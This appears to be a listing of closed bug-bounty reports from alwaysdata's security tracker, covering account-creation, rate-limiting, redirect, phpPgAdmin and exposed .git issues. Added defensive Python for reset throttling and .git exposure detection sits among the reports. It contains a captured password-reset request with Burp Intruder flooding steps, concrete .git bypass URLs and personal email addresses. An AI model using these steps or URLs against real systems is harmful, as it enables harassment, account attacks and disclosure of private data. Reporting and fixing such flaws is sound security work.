- Account Recovery Problems: Users might face difficulties in recovering their accounts if email addresses are not verified.
### Recommendation
Implement email verification as a mandatory step in the account creation process to ensure that the email addresses are valid and belong to the users registering them.
|
|
53 | Closed | Lack of Email Confirmation During Account Creation | lostsam |
Task Description
Severity: High
Vulnerability Description: The website allows users to create accounts without verifying their email addresses. This practice poses significant security and usability risks.
Impact:
Spam and Fake Accounts:
Malicious users can create multiple fake accounts, leading to spam and abuse of the platform. Automated scripts (bots) can exploit this vulnerability to flood the system with fake accounts, overwhelming resources and degrading performance.
Account Security:
Unauthorized users can create accounts using someone else's email address, potentially leading to privacy breaches and unauthorized access to personal information. Genuine users might be unable to access their accounts if their email addresses are misused by others.
Communication Failures:
Users may not receive important notifications, updates, or password reset instructions, leading to poor user experience and support issues.
Reputation and Trust:
The lack of basic security measures can lead to loss of trust among users and damage the website's reputation. Users might perceive the platform as insecure and unreliable, leading to reduced user retention and engagement.
Steps to Reproduce:
1. Navigate to the account creation page.
2. Enter any email address (including ones that do not belong to the user) and complete the registration process.
3. Observe that the account is created and accessible without any email verification step.
Recommended Mitigation:
Implement Email Verification:
During registration, send a confirmation email to the provided email address containing a unique verification link. Require users to click on the verification link to activate their accounts.
Use CAPTCHA:
Incorporate CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) during the registration process to prevent automated bots from creating accounts.
Rate Limiting:
Implement rate limiting on the account creation endpoint to prevent mass account creation from the same IP address within a short period.
Audit Existing Accounts:
Review existing accounts for potential fake or unauthorized accounts and take appropriate actions, such as sending verification requests or disabling suspect accounts.
References:
- OWASP Authentication Cheat Sheet
- NIST Digital Identity Guidelines: NIST SP 800-63B
|
|
52 | Closed | Direct IP Access of the Domain on HTTP | lostsam |
Task Description
Hello Team, my name is Pawan Yadav, a cyber security researcher from India. While testing one of your domains, I have found a vulnerability in your site.
Here is the detailed report:
Vulnerability Description :- Direct IP access refers to the ability to access a website or service directly via its IP address rather than its domain name (e.g., http://185.31.40.186/ instead of https://admin.alwaysdata.com/login/?next=/ ). Direct IP access can bypass certain security controls implemented at the domain level, potentially exposing sensitive information or allowing unauthorized access to resources.
Attack Vector :- An attacker can directly access the web application by using its IP address, bypassing domain-based security controls such as Web Application Firewalls (WAFs), IP filtering, or access controls based on the domain name.
Domain :- https://admin.alwaysdata.com/login/?next=/
Direct IP Access :- http://185.31.40.186/
Reference :- https://www.nexgi.com/digital-library/direct-ip-access/
Impact:-
- Denial of Service: Direct IP-address access has its own set of issues. For starters, it increases the chances of encountering a Distributed Denial of Service attack.
- Data Interception: Attackers can intercept and read sensitive information transmitted between the server and clients, such as login credentials, personal information, and payment details.
- Man-in-the-Middle Attacks: This vulnerability enables attackers to intercept and potentially alter the communication between the server and client, leading to unauthorized data modification or injection of malicious content.
- Loss of User Trust: A lack of HTTPS can undermine the trust and credibility of the website among its users, potentially leading to decreased user engagement and conversions.
POC
https://drive.google.com/file/d/19idNkDidehPI_SR3qQfvArwgCSji7elc/view?usp=sharing
|
|
51 | Closed | Multiple Free Public Cloud accounts obtained by a singl ... | d_sharad |
Task Description
Description
Alwaysdata allows users to create a Free Public Cloud (100MB) account. Each user is limited to having only one Free Public Cloud (100MB) account. However, I discovered that a user can bypass this restriction and obtain multiple Free Public Cloud (100MB) accounts by asking other users to create a new free account and then transfer ownership of that account to them.
Reproduction Steps
1. User A creates a new Free Public Cloud (100MB) storage account.
2. User B creates a new Free Public Cloud (100MB) storage account.
3. User B transfers ownership of their account to User A through: https://admin.alwaysdata.com/admin/account/
4. User A now has two Free Public Cloud (100MB) storage accounts (their original account and the one transferred from User B).
5. This process can be repeated with the same User B an unlimited number of times to accumulate an unlimited number of free accounts.
Impact
By exploiting account ownership transfers, a user can essentially obtain unlimited free storage, potentially leading to loss for alwaysdata
Recommendation
Implement additional checks and restrictions to prevent users from obtaining multiple free accounts through ownership transfers. Possible mitigations could include:
1. Limiting the number of free accounts a user can own, regardless of the acquisition method (creation or transfer).
2. Disallowing ownership transfers for free accounts or requiring explicit approval from the service provider.
3. Automatically consolidating multiple free accounts under the same user into a single account, preserving the total storage limit.
Proof of Concept:
|
|
49 | Closed | Vulnerability Report: Lack of Rate Limiting on Password ... | anshumanbaghel |
Task Description
The website does not implement rate limiting on password reset links, allowing an attacker to repeatedly request password reset links for any account. This could lead to account takeover through brute-force attacks.
Description When an attacker gains access to a target account's email address, they can repeatedly request password reset links without any rate limiting in place. This allows them to flood the target's email inbox with reset links, making it difficult for the legitimate user to identify and use the valid reset link. Additionally, the attacker can automate this process, increasing the efficiency of the attack.
Impact Account Takeover: Attackers can potentially take over user accounts by flooding their email inbox with reset links, making it easier to intercept a valid reset link and gain unauthorized access. User Disruption: The flood of reset links can disrupt the user's ability to use their email normally, causing inconvenience and potential confusion.
Recommendations Implement rate limiting on password reset requests to prevent brute-force attacks. Limit the number of password reset links that can be requested per minute per IP address or account. Implement CAPTCHA or other mechanisms to distinguish between automated and legitimate requests.
Steps to Reproduce
1. Go to https://admin.alwaysdata.com/login/, enter your email and click on Forgot Password.
2. Intercept the request with Burp and send it to Intruder.
3. Make a payload and start the attack.
Supporting Material/References
OWASP Password Reset Best Practices
Impact Account Takeover User Disruption
Proof of Concept
Screenshot attached (see link below).
Request (captured with Burp Suite):

```http
POST /password/lost/ HTTP/2
Host: admin.alwaysdata.com
Cookie: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://admin.alwaysdata.com/password/lost/
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
Origin: https://admin.alwaysdata.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

csrfmiddlewaretoken=8GNhIyHjyRaBHSlBRaaN9gMWKaksiJR3Py8S3TJoW8zb7tq5gU4JzRA1cMEp0VHl&email=alexdoppler29%40gmail.com
```
SS LINK - https://drive.google.com/file/d/1a0vqAOB6u6ayQSNX4ktQuUOWIAgNQjAR/view?usp=sharing
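Added example, not code from the report or from alwaysdata: the recommended throttle for the reset endpoint above, implemented as a sliding-window limiter keyed separately by target address (protects the victim's inbox) and by source IP (slows one client spraying many addresses). The service also returns the same message whether or not the address exists and charges both limiters on every call, so the endpoint does not double as an account-enumeration oracle. Limits, addresses and the in-memory outbox are constructed for the demo.

```python
"""Per-address and per-IP throttling for a password-reset endpoint."""
from __future__ import annotations

from collections import defaultdict, deque


class SlidingWindowLimiter:
    """At most `limit` accepted events per key within any trailing `window` seconds."""

    def __init__(self, limit: int, window: float) -> None:
        self.limit = limit
        self.window = window
        self._hits: dict[str, deque[float]] = defaultdict(deque)

    def allow(self, key: str, now: float) -> bool:
        hits = self._hits[key]
        while hits and hits[0] <= now - self.window:   # forget events that left the window
            hits.popleft()
        if len(hits) >= self.limit:
            return False
        hits.append(now)                                # only accepted events consume a slot
        return True


class PasswordResetService:
    GENERIC_REPLY = "If an account exists for that address, a reset link has been sent."

    def __init__(self, known_emails, per_email=(3, 3600), per_ip=(10, 3600)) -> None:
        self.known = {e.strip().lower() for e in known_emails}
        self.by_email = SlidingWindowLimiter(*per_email)   # constructed limit: 3 mails/hour per address
        self.by_ip = SlidingWindowLimiter(*per_ip)         # constructed limit: 10 requests/hour per IP
        self.outbox: list[tuple[str, float]] = []          # stands in for the mailer

    def request_reset(self, email: str, ip: str, now: float) -> tuple[str, bool]:
        """Return (message shown to the caller, whether a mail was actually sent).

        Both limiters are consulted and charged on every call, known address or not,
        so neither the reply nor the throttling behaviour reveals account existence.
        """
        email = email.strip().lower()
        ip_ok = self.by_ip.allow(ip, now)
        email_ok = self.by_email.allow(email, now)
        sent = False
        if ip_ok and email_ok and email in self.known:
            self.outbox.append((email, now))
            sent = True
        return self.GENERIC_REPLY, sent
```

In an HTTP front end the two outcomes should also share the status code and roughly the response time. Pair the throttle with single-use reset tokens that expire and supersede earlier ones, so that even a flooded inbox contains at most one live link.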
|
|
47 | Closed | information disclosure | Bhavish |
Task Description
I found this detail in one of the git files on https://security.alwaysdata.com/.git/config
and this file contains: 0000000000000000000000000000000000000000 58bea729f4359a45f69aaba274bb2a931155b427 Cyril Baÿ <cbay@alwaysdata.com> 1704809861 +0100 clone: from https://github.com/flyspray/flyspray.git
This information is in the file named master, which I think is sensitive as it discloses the email address and other stuff. Other files like config and packed-refs also contain sensitive information, but it is all up to you to decide whether the information is sensitive or not. Contact me on my email: bhavishthakral123@gmail.com
|
|
46 | Closed | Open Redirection Vulnerability | rockert |
Task Description
Hi Team,
I hope this email finds you well. I am Ali Haider, a security researcher and a penetration tester. I have been a bug bounty hunter for almost 2 years now. I have always enjoyed the challenge of finding vulnerabilities, as it always felt like a great achievement to find them. I wanted to bring to your attention an Open Redirection Vulnerability I encountered while using your website.
|
|
45 | Closed | Bug Title: Missing access control at password change. | bugtest09 |
Task Description
Hello Web Security
Severity: Medium
Domain: https://admin.alwaysdata.com
Description : A security researcher discovered that after resetting a password, the user was automatically logged in. As such, compromising a legitimate password reset link (via referrer token leakage or a similar issue) could lead to compromising the account since the user would not be forced to log in after resetting their password.
Proof Of Concept:
1. Go to this website: https://admin.alwaysdata.com
2. Send the password reset link to your email.
3. Go to your email and open the link.
4. Set a new password.
5. Boom. Automatically logged in.
Fix: OWASP forgot password recommendations(https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet) suggest a better approach, which we have now implemented.
Thanks.
References:
https://hackerone.com/reports/164648
https://hackerone.com/reports/255020
|
|
43 | Closed | Information Disclosure PHPpgAdmin | 0xmagdy |
Task Description
Vulnerability Detail
The PHPpgAdmin setup page is accessible over the internet, where it is possible for a user to set up servers with the required details.
Vulnerable Endpoints
https://phppgadmin.alwaysdata.com/phppgadmin/redirect.php?subject=root
You can add a server via this endpoint: https://phppgadmin.alwaysdata.com/phppgadmin/redirect.php?subject=server&server=&
Impact
It is possible for an attacker to configure the servers without the knowledge of the application administrator.
|
|
35 | Closed | Git Folder Forbidden Bypass | roxy |
Task Description
Hi,
During a Google search I found an open sensitive git directory. A Git metadata directory (.git) was found in this folder. An attacker can extract sensitive information by requesting the hidden metadata directory that the version control tool Git creates. The metadata directories are used for development purposes to keep track of development changes to a set of source code before it is committed back to a central repository (and vice versa). When code is rolled to a live server from a repository, it is supposed to be done as an export rather than as a local working copy, and hence this problem.
Vulnerable URLs:
https://upload.alwaysdata.com/.git/ (403 forbidden)
Bypass:
https://upload.alwaysdata.com/.git/config
https://upload.alwaysdata.com/.git/logs/HEAD
https://security.alwaysdata.com/.git/ (403 forbidden)
Bypass:
https://security.alwaysdata.com/.git/config
https://security.alwaysdata.com/.git/logs/HEAD
These files may expose sensitive information that may help a malicious user to prepare more advanced attacks. Remove these files from production systems or restrict access to the .git directory. To deny access to all the .git folders you need to add the following lines in the appropriate context (either global config, or vhost/directory, or from .htaccess).
Thanks
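Added example covering tasks 47 and 35 above; it is not code from either report or from alwaysdata. It recognises an exposed `.git` directory from the bodies of its well-known files (so a 403 on `/.git/` but a 200 on `/.git/config`, the bypass both reports use, is caught) and parses reflog lines to enumerate what they leak: committer identities, timestamps and the clone source. The file bodies are constructed; the reflog line reproduces the format quoted in task 47.

```python
"""Recognise an exposed .git directory from fetched file bodies and list what the reflog leaks."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ReflogEntry:
    old_sha: str        # all zeros on the first entry, i.e. the clone that created the repository
    new_sha: str
    name: str
    email: str
    timestamp: int      # Unix time of the action
    tz: str
    message: str


# <old-sha> <new-sha> <name> <<email>> <unix-time> <tz>\t<message>
# \s+ before the message also accepts a copy in which the tab has become spaces.
_REFLOG_RE = re.compile(
    r"^([0-9a-f]{40}) ([0-9a-f]{40}) (.*?) <([^>]*)> (\d+) ([+-]\d{4})\s+(.*)$"
)


def parse_reflog_line(line: str) -> ReflogEntry | None:
    m = _REFLOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    old, new, name, email, ts, tz, msg = m.groups()
    return ReflogEntry(old, new, name, email, int(ts), tz, msg)


def exposed_git_findings(files: dict[str, str]) -> list[str]:
    """`files` maps a path under the web root (".git/config", ".git/HEAD", ".git/logs/HEAD")
    to the body the server returned. Error pages produce no finding; only content that has
    the shape of the real file counts, which is the check to run when the directory URL
    itself answers 403."""
    findings: list[str] = []
    cfg = files.get(".git/config", "")
    if "[core]" in cfg and "repositoryformatversion" in cfg:
        findings.append("repository config exposed")
        for m in re.finditer(r"^\s*url\s*=\s*(\S+)", cfg, re.M):
            findings.append(f"remote url: {m.group(1)}")
    head = files.get(".git/HEAD", "")
    if head.startswith("ref: refs/heads/"):
        findings.append(f"current branch: {head.split('refs/heads/', 1)[1].strip()}")
    for line in files.get(".git/logs/HEAD", "").splitlines():
        entry = parse_reflog_line(line)
        if entry:
            findings.append(f"identity: {entry.name} <{entry.email}>; {entry.message}")
    return findings


# Constructed bodies standing in for what the two reports fetched.
SAMPLE_CONFIG = """[core]
\trepositoryformatversion = 0
\tfilemode = true
\tbare = false
[remote "origin"]
\turl = https://github.com/flyspray/flyspray.git
\tfetch = +refs/heads/*:refs/remotes/origin/*
"""
SAMPLE_REFLOG = (
    "0000000000000000000000000000000000000000 58bea729f4359a45f69aaba274bb2a931155b427 "
    "Cyril Baÿ <cbay@alwaysdata.com> 1704809861 +0100\tclone: from https://github.com/flyspray/flyspray.git\n"
)
SAMPLE_FILES = {
    ".git/config": SAMPLE_CONFIG,
    ".git/HEAD": "ref: refs/heads/master\n",
    ".git/logs/HEAD": SAMPLE_REFLOG,
}
```

The directory-level 403 the reports bypass comes from protecting the directory URL rather than the path prefix; a prefix rule such as nginx `location ~ /\.git { deny all; }` or Apache `RedirectMatch 404 /\.git` covers `/.git/config`, `/.git/logs/HEAD` and everything else underneath, and deploying an export instead of a working copy removes the directory altogether.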
|
|
32 | Closed | Server Path Traversal + Information Disclosure on admin ... | freetb | |
|
31 | Closed | Broken Access Vulnerability via 'Impossible deletion' E ... | freetb | |
|
30 | Closed | Information Disclosure on cAdvisor software via Origin ... | freetb | |
|
29 | Closed | URL Override in api.alwaysdata.com | freetb | |
|
28 | Closed | Summary: A username disclosure vulnerability has been i ... | nilesh | |
|
26 | Closed | #1 Crititical Vulnerability Name: No Rate Limit in addi ... | Fahimhusain Raydurg | |
|
25 | Closed | Title: Security Report: Public Exposure of Sensitive In ... | monty099 | |
|
24 | Closed | Security Report:Broken Access Control (BAC) in [admin.a ... | monty099 | |
|
23 | Closed | Subject: Vulnerability Report: Transmission of Credenti ... | neelshukla0409 | |
|
22 | Closed | Vulnerability Report: Unverified Email Registration on ... | neelshukla0409 | |
|
21 | Closed | Bug Bounty Report | Aditya2003 | |
|
20 | Closed | Unauthorized Access to Over 6000+ Valid User Credential ... | Bad_Script3r | |
|
19 | Closed | User Enumeration Through Forgot Password Vulnerability | basil | |
|
2 | Closed | XSS Vulnerability in [admin.alwaysdata.com] Support Tic ... | Redhet | |